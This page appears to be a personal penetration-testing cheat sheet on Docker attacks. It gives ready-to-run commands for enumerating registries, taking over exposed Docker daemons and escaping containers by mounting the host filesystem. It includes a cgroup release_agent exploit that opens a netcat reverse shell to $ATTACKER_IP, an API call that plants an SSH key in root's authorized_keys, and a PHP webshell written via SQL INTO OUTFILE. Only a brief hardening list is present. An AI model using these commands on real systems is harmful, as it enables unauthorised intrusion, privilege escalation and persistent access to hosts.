<li><a href="#reversing-docker-images">Reversing Docker Images</a></li>
|
|
<li><a href="#uploading-images-to-registry">Uploading Images to Registry</a></li>
|
|
<li><a href="#rce-via-exposed-docker-daemon">RCE via Exposed Docker Daemon</a></li>
|
|
<li><a href="#escape-container-via-exposed-docker-daemon">Escape Container via Exposed Docker Daemon</a></li>
|
|
<li><a href="#shared-namespaces">Shared Namespaces</a></li>
|
|
<li><a href="#misconfiguration">Misconfiguration</a></li>
|
|
<li><a href="#check-fdisk">Check fdisk</a></li>
|
|
<li><a href="#creating-a-container-from-inside-another-container">Creating a Container from inside another container</a></li>
|
|
<li><a href="#escape-through-db">Escape through DB</a></li>
|
|
<li><a href="#dirty-c0w">Dirty c0w</a></li>
|
|
<li><a href="#runc">runC</a></li>
|
|
<li><a href="#securing-a-container">Securing a Container</a></li>
|
|
<li><a href="#checking-if-you-are-inside-a-container">Checking if you are inside a container</a></li>
|
|
</ul>
|
|
</li>
|
|
</ul>
|
|
</div>
|
|
<h1 id="docker-vulnerabilities">Docker Vulnerabilities</h1>
|
|
<ul>
|
|
<li><a href="https://github.com/stealthcopter/deepce">Container enumeration</a></li>
|
|
</ul>
|
|
<h2 id="abusing-registry">Abusing Registry</h2>
|
|
<ul>
|
|
<li><a href="https://docs.docker.com/registry/spec/api/">Registry Doc</a></li>
|
|
<li>Registry is a json API endpoint</li>
|
|
<li>Private registry added in <code>/etc/docker/daemon.json</code></li>
|
|
<li>Can be found by nmap as a service</li>
|
|
</ul>
|
|
<h3 id="enumeration">Enumeration</h3>
|
|
<ul>
|
|
<li>General query</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>curl http://test.com:5000/v2/_catalog<span class="sb">`</span>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>List tags</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li><code>history</code> section of the json object contains commands executed at build phase. May contain sensitive data like passwords.</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
|
|
</code></pre></div>
|
|
|
|
<h2 id="reversing-docker-images">Reversing Docker Images</h2>
|
|
<ul>
|
|
<li><a href="https://github.com/wagoodman/dive">Dive</a></li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>dive <IMAGE-ID>
|
|
</code></pre></div>
|
|
|
|
<h2 id="uploading-images-to-registry">Uploading Images to Registry</h2>
|
|
<ul>
|
|
<li>Ever image has a <code>latest</code> tag</li>
|
|
<li>Upload modified docker image as <code>latest</code></li>
|
|
<li><a href="https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining">Article</a></li>
|
|
</ul>
|
|
<h2 id="rce-via-exposed-docker-daemon">RCE via Exposed Docker Daemon</h2>
|
|
<ul>
|
|
<li>Users inside the <code>docker</code> group may open tcp socket through docker</li>
|
|
<li><code>nmap -sV -p- <IP> -vv</code> to find exposed tcp sockets via docker</li>
|
|
<li>Confirming via <code>curl http://test.com:2375/version</code> on open docker port</li>
|
|
<li>
|
|
<p>Execute commands on socket
|
|
<code>sh
|
|
docker -H tcp://test.com:2375 ps
|
|
docker -H tcp://test.com:2375 exec <container> <cmd>
|
|
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh</code></p>
|
|
</li>
|
|
<li>
|
|
<p><a href="https://registry.hub.docker.com/r/chrisfosterelli/rootplease">root please</a></p>
|
|
</li>
|
|
</ul>
|
|
<h2 id="escape-container-via-exposed-docker-daemon">Escape Container via Exposed Docker Daemon</h2>
|
|
<ul>
|
|
<li>Looking for exposed docker sockets</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>find / -name <span class="s2">"*sock"</span>
|
|
groups
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Mount the host volume and chroot to it, need alpine image. </li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>docker images
|
|
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
|
|
</code></pre></div>
|
|
|
|
<p>or</p>
|
|
<div class="codehilite"><pre><span></span><code>docker run -v /:/host --rm -it <imageID> chroot /host/ bash
|
|
</code></pre></div>
|
|
|
|
<h2 id="shared-namespaces">Shared Namespaces</h2>
|
|
<ul>
|
|
<li>Namespaces</li>
|
|
<li>Cgroups</li>
|
|
<li>
|
|
<p>OverlayFS</p>
|
|
</li>
|
|
<li>
|
|
<p>Requires root inside the container</p>
|
|
</li>
|
|
<li>
|
|
<p>Execute command</p>
|
|
</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>nsenter --target <span class="m">1</span> --mount sh
|
|
</code></pre></div>
|
|
|
|
<h2 id="misconfiguration">Misconfiguration</h2>
|
|
<ul>
|
|
<li>Privileged container connect to the host directly, not through the docker engine</li>
|
|
<li>Execution of bins on the host from libs inside the container is possible</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>capsh --print
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>
|
|
<p><code>man capabilities</code></p>
|
|
</li>
|
|
<li>
|
|
<p><a href="https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.">PoC</a></p>
|
|
</li>
|
|
<li>
|
|
<p>Exploit and get a reverse shell to the host via</p>
|
|
</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>mkdir /tmp/cgrp <span class="o">&&</span> mount -t cgroup -o rdma cgroup /tmp/cgrp <span class="o">&&</span> mkdir /tmp/cgrp/x
|
|
<span class="nb">echo</span> <span class="m">1</span> > /tmp/cgrp/x/notify_on_release
|
|
<span class="nv">host_path</span><span class="o">=</span><span class="sb">`</span>sed -n <span class="s1">'s/.*\perdir=\([^,]*\).*/\1/p'</span> /etc/mtab<span class="sb">`</span>
|
|
<span class="nb">echo</span> <span class="s2">"</span><span class="nv">$host_path</span><span class="s2">/exploit"</span> > /tmp/cgrp/release_agent
|
|
<span class="nb">echo</span> <span class="s1">'#!/bin/sh'</span> > /exploit
|
|
<span class="nb">echo</span> <span class="s2">"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc </span><span class="nv">$ATTACKER_IP</span><span class="s2"> 4711 >/tmp/f"</span> >> /exploit
|
|
chmod a+x /exploit
|
|
sh -c <span class="s2">"echo \$\$ > /tmp/cgrp/x/cgroup.procs"</span>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>The file may appear outside the container on the host system</li>
|
|
</ul>
|
|
<h2 id="check-fdisk">Check fdisk</h2>
|
|
<ul>
|
|
<li><code>fdisk -l</code> and <code>lsblk</code>, host bulk device may be exposed</li>
|
|
<li>Mount the device</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>mkdir /mnt/hostdev
|
|
mount /dev/<hostVda> /mnt/hostdev
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Check <code>/dev</code> as well !!! and mount device</li>
|
|
</ul>
|
|
<h2 id="creating-a-container-from-inside-another-container">Creating a Container from inside another container</h2>
|
|
<ul>
|
|
<li>Needs root inside a container</li>
|
|
<li>Upload <a href="https://github.com/moparisthebest/static-curl">static curl</a></li>
|
|
<li>Check available images and containers</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
|
|
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Inside the container as root</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>curl -X POST -H <span class="s2">"Content-Type: application/json"</span> --unix-socket /var/run/docker.sock http://localhost/containers/create -d <span class="s1">'{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'</span>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Return value is the ID</li>
|
|
<li>Start a container</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>curl-amd64 -X POST -H <span class="s2">"Content-Type:application/json"</span> --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Login in to the host via ssh remotely or socat locally</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>socat - UNIX-CONNECT:/var/run/docker.sock
|
|
POST /containers/<CONTAINERID>/attach?stream<span class="o">=</span><span class="m">1</span><span class="p">&</span><span class="nv">stdin</span><span class="o">=</span><span class="m">1</span><span class="p">&</span><span class="nv">stdout</span><span class="o">=</span><span class="m">1</span><span class="p">&</span><span class="nv">stderr</span><span class="o">=</span><span class="m">1</span> HTTP/1.1
|
|
Host:
|
|
Connection: Upgrade
|
|
Upgrade: tcp
|
|
|
|
HTTP/1.1 <span class="m">101</span> UPGRADED
|
|
Content-Type: application/vnd.docker.raw-stream
|
|
Connection: Upgrade
|
|
Upgrade: tcp
|
|
</code></pre></div>
|
|
|
|
<h2 id="escape-through-db">Escape through DB</h2>
|
|
<ul>
|
|
<li>Login into DB</li>
|
|
<li>Create table</li>
|
|
<li>Inject PHP code</li>
|
|
<li>Select table content intoa file the user can read</li>
|
|
<li>Execute the file</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="k">create</span><span class="w"> </span><span class="k">table</span><span class="w"> </span><span class="n">h4x0r</span><span class="w"> </span><span class="p">(</span><span class="n">pwn</span><span class="w"> </span><span class="nb">varchar</span><span class="p">(</span><span class="mi">1024</span><span class="p">));</span><span class="w"></span>
|
|
<span class="k">insert</span><span class="w"> </span><span class="k">into</span><span class="w"> </span><span class="n">h4x0r</span><span class="w"> </span><span class="p">(</span><span class="n">pwn</span><span class="p">)</span><span class="w"> </span><span class="k">values</span><span class="w"> </span><span class="p">(</span><span class="s1">'<?php $cmd=$_GET[“cmd”];system($cmd);?>'</span><span class="p">);</span><span class="w"></span>
|
|
<span class="k">select</span><span class="w"> </span><span class="s1">'<?php $cmd=$_GET["cmd"];system($cmd);?>'</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s1">'/var/www/html/shell.php'</span><span class="p">;</span><span class="w"></span>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>curl the webshell hon the exploited host</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>curl <host-IP>/shell.php?cmd<span class="o">=</span>id
|
|
</code></pre></div>
|
|
|
|
<h2 id="dirty-c0w">Dirty c0w</h2>
|
|
<p>https://github.com/dirtycow/dirtycow.github.io</p>
|
|
<h2 id="runc">runC</h2>
|
|
<p><a href="https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/">CVE-2019-5736</a></p>
|
|
<h2 id="securing-a-container">Securing a Container</h2>
|
|
<ul>
|
|
<li>Least Privileges</li>
|
|
<li>Seccomp</li>
|
|
<li>Securing Registry via TLS</li>
|
|
</ul>
|
|
<h2 id="checking-if-you-are-inside-a-container">Checking if you are inside a container</h2>
|
|
<ul>
|
|
<li>Low process count</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>ps aux
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li><code>.dockerenv</code> in <code>/</code></li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="nb">cd</span> / <span class="o">&&</span> ls -lah
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>cgroups contain docker names</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="nb">pwd</span> /proc/1
|
|
cat cgroups
|
|
</code></pre></div>
|
|
</span>
|
|
</div>
|
|
</div>
|
|
<div id="footer">
|
|
|
|
<p></p>
|
|
<center>
|
|
© Stefan Friese
|
|
</center>
|
|
|
|
</div>
|
|
|
|
<script>
|
|
function linkClick(obj) {
|
|
if (obj.open) {
|
|
//console.log('open');
|
|
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
|
|
sessionStorage.removeItem(obj.id);
|
|
}
|
|
sessionStorage.setItem(obj.id,"open");
|
|
console.log(obj.id);
|
|
} else {
|
|
//console.log('closed');
|
|
sessionStorage.removeItem(obj.id);
|
|
}
|
|
}
|
|
|
|
let _keys = Object.keys(sessionStorage);
|
|
if (_keys) {
|
|
for ( let i = 0; i < _keys.length; i++ ) {
|
|
document.getElementById(_keys[i])['open'] = 'open';
|
|
}
|
|
}
|
|
</script>
|
|
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
|
|
<script type="text/x-mathjax-config">
|
|
MathJax.Hub.Config({
|
|
config: ["MMLorHTML.js"],
|
|
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
|
|
extensions: ["MathMenu.js", "MathZoom.js"]
|
|
});
|
|
</script>
|
|
</body>
|
|
</html> |